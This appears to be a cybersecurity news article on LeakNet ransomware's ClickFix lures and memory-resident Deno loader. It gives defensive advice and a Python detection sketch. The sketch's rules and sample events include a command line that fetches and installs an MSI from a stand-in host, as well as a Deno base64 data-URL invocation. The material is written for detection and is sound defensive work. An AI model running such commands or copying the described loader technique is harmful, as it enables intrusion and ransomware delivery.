LeakNet Ransomware Uses ClickFix Lures and Deno Loader for Stealthy Attacks
Key Takeaways
- The LeakNet ransomware group has significantly escalated its operations, moving from an average of three victims monthly to a rapid expansion.
- The group now employs “ClickFix” social engineering lures and a highly stealthy, Deno-based memory loader to bypass traditional security defenses.
- ClickFix lures are hosted on legitimate but compromised websites, presenting fake Cloudflare Turnstile checks to trick users into executing malicious commands.
- The Deno-based loader operates entirely in memory, making it exceptionally difficult for signature-based security tools to detect.
- Defenders should focus on behavioral monitoring, restrict user command execution, and implement network egress filtering to mitigate the threat.
LeakNet Ransomware Elevates Threat with ClickFix Lures and Stealthy Deno Loader
The LeakNet ransomware collective is undergoing a significant operational transformation, abandoning its previous, slower pace of approximately three victims per month in favor of a rapid expansion. This surge in activity is underpinned by the integration of sophisticated new tools specifically engineered to bypass the majority of existing security safeguards.
Central to LeakNet’s updated arsenal are two critical additions: a cunning social engineering tactic dubbed ClickFix and a highly evasive, memory-resident loader built upon the Deno JavaScript runtime.
ClickFix: A Broader Net for Victim Acquisition
While ClickFix itself isn’t a novel technique within the threat landscape, its adoption by LeakNet signals a pivotal shift in the group’s victim acquisition strategy. Rather than relying on purchasing stolen access credentials from initial access brokers (IABs) in illicit online marketplaces, LeakNet now deploys deceptive verification pages on compromised, yet otherwise legitimate, websites.
When an unsuspecting user navigates to one of these tainted pages, they are presented with what appears to be a standard Cloudflare Turnstile verification prompt, instructing them to manually execute a specific command. This approach lacks a defined victim profile; instead, LeakNet casts a wide net, banking on a percentage of users to fall for the ruse.
Analysts at ReliaQuest meticulously documented this activity across multiple recent incidents, confidently attributing it to LeakNet due to consistent infrastructure and identical tactics, techniques, and procedures (TTPs). This strategic pivot away from IABs is a calculated move, eliminating a dependency that previously hampered the group’s speed and dramatically expanding the pool of potential targets. ClickFix has emerged as a favored delivery mechanism across the broader threat landscape, reportedly facilitating the distribution of 59% of the top malware families tracked in 2025.
This evolving methodology places any employee browsing the web at increased risk. Because these malicious lures reside on authentic websites rather than attacker-controlled domains, conventional network-layer defenses generate significantly fewer alerts. A red flag typically only appears after a user has already executed the malicious command, emphasizing the critical role of behavioral monitoring—especially for suspicious msiexec commands and unexpected outbound connections—over exclusive reliance on domain-based blocking.
What makes LeakNet’s current campaign particularly concerning is the consistent post-exploitation chain, which remains identical regardless of the initial entry point, whether through ClickFix or Microsoft Teams phishing. The group employs the same set of tools for execution, lateral movement, and payload staging, irrespective of how initial access was gained. This operational consistency, however, offers a valuable advantage for defenders: understanding these predictable steps provides clear opportunities for detection and prompt attack termination.
The Stealthy Deno-Based Loader
A technically sophisticated and particularly dangerous component of LeakNet’s updated toolkit is a previously undocumented loader built upon Deno, a legitimate JavaScript and TypeScript runtime widely used by developers. LeakNet employs a “bring-your-own-runtime” (BYOR) strategy: instead of deploying a custom malicious binary that might trigger security tools, the attackers install the authentic, trusted Deno executable on the victim’s machine, then leverage it to execute harmful code.
The loader is activated via PowerShell and Visual Basic Script files, frequently named Romeo*.ps1 and Juliet*.vbs. Crucially, LeakNet avoids writing a JavaScript file to disk, where it could be scanned, by instead feeding the payload to Deno as a base64-encoded data URL. Deno then decodes and executes this payload entirely in memory. Because no JavaScript payload file is ever written to the endpoint, signature-based security tools that rely on scanning files on disk have nothing to match against.
Upon execution, the loader gathers fundamental system information, including username, hostname, memory size, and operating system version, subsequently generating a unique victim fingerprint. It then establishes a connection to attacker-controlled infrastructure to retrieve a victim-specific second-stage payload, prevents duplicate instances by binding to a local port, and initiates a continuous loop of fetching and executing further code directly in memory.
What You Should Do
- Block Newly Registered Domains: LeakNet’s command-and-control (C2) servers are often newly registered. Implement policies to block access to domains registered within the last few weeks.
- Restrict User Command Execution: Limit the ability of regular users to run commands through the Win+R Run dialog on their workstations, so that a ClickFix lure cannot simply talk them into pasting and executing malicious instructions.
- Control PsExec Usage: Restrict PsExec to only authorized administrators through Group Policy Objects (GPOs) to prevent its misuse for lateral movement.
- Monitor for Anomalous Activity: Watch for signs of jli.dll sideloading in the C:\ProgramData\USOShared directory, unusual PsExec activity, and unexpected outbound connections, especially to S3 buckets.
- Implement Behavioral Monitoring: Prioritize security solutions capable of detecting suspicious behavioral patterns, particularly concerning unexpected process execution and outbound network connections, rather than relying solely on signature-based or domain-blocking tools.
- Isolate Compromised Hosts Immediately: Upon confirming post-exploitation behavior, promptly isolate the affected host to break the attack chain before ransomware deployment.
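As an added defender-side illustration (not code from the article, ReliaQuest or HackersRadar), the following Python sketch turns the indicators described in the loader section and the monitoring items above into rules run over constructed process events; the Event schema, rule names and sample records are assumptions and would need mapping onto your own EDR or Sysmon fields.

```python
"""Scan constructed process telemetry for the LeakNet tradecraft described above.
Added illustration, not ReliaQuest's or HackersRadar's detection content. The Event
schema (host, image, cmdline, parent, loaded) is assumed; map it to your EDR/Sysmon fields.
"""
import re
from dataclasses import dataclass

@dataclass
class Event:
    host: str
    image: str        # full path of the created process
    cmdline: str      # its command line
    parent: str       # parent process image name
    loaded: str = ""  # DLL path for image-load events, else empty

# (rule name, predicate). Every indicator comes from the article's description.
RULES = [
    # Deno handed a base64 data: URL instead of a script file on disk
    ("deno_data_url_payload", lambda e: e.image.lower().endswith("deno.exe")
        and re.search(r'data:[^\s"]*;base64,', e.cmdline, re.I) is not None),
    # the Romeo*.ps1 / Juliet*.vbs stager file names
    ("romeo_juliet_stager", lambda e: re.search(
        r"\\(Romeo[^\\\s]*\.ps1|Juliet[^\\\s]*\.vbs)\b", e.cmdline, re.I) is not None),
    # msiexec fetching a package from a remote URL (typical ClickFix run-dialog command)
    ("msiexec_remote_package", lambda e: e.image.lower().endswith("msiexec.exe")
        and re.search(r"https?://", e.cmdline, re.I) is not None),
    # jli.dll loaded out of C:\ProgramData\USOShared
    ("jli_dll_sideload_usoshared", lambda e:
        e.loaded.lower().startswith("c:\\programdata\\usoshared\\")
        and e.loaded.lower().endswith("\\jli.dll")),
    # anything spawned by the PsExec service binary
    ("psexec_child", lambda e: e.parent.lower() in ("psexesvc.exe", "psexec.exe")),
]

def evaluate(events):
    """Return [(host, rule_name)] for every event/rule pair that matches."""
    return [(ev.host, name) for ev in events for name, pred in RULES if pred(ev)]

# Constructed sample telemetry: four suspicious events, one benign one.
SAMPLE = [
    Event("ws01", r"C:\Users\a\.deno\bin\deno.exe",
          'deno run -A "data:text/javascript;base64,Y29uc29sZS5sb2coMSk="', "wscript.exe"),
    Event("ws01", r"C:\Windows\System32\wscript.exe",
          r"wscript.exe C:\Users\a\AppData\Local\Temp\Juliet_7.vbs", "explorer.exe"),
    Event("ws01", r"C:\Windows\System32\msiexec.exe",
          "msiexec /i https://example.invalid/update.msi /qn", "explorer.exe"),
    Event("srv02", r"C:\ProgramData\USOShared\java.exe", "java.exe", "PSEXESVC.exe",
          loaded=r"C:\ProgramData\USOShared\jli.dll"),
    Event("ws03", r"C:\Users\b\.deno\bin\deno.exe", "deno run main.ts", "cmd.exe"),
]
```

Running `evaluate(SAMPLE)` yields one hit per matching rule, so the srv02 event surfaces twice (sideload plus PsExec parent) while the developer's ordinary `deno run main.ts` on ws03 stays silent.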
Disclaimer: HackersRadar reports on cybersecurity threats and incidents for informational and awareness purposes only. We do not engage in hacking activities, data exfiltration, or the hosting or distribution of stolen or leaked information. All content is based on publicly available sources.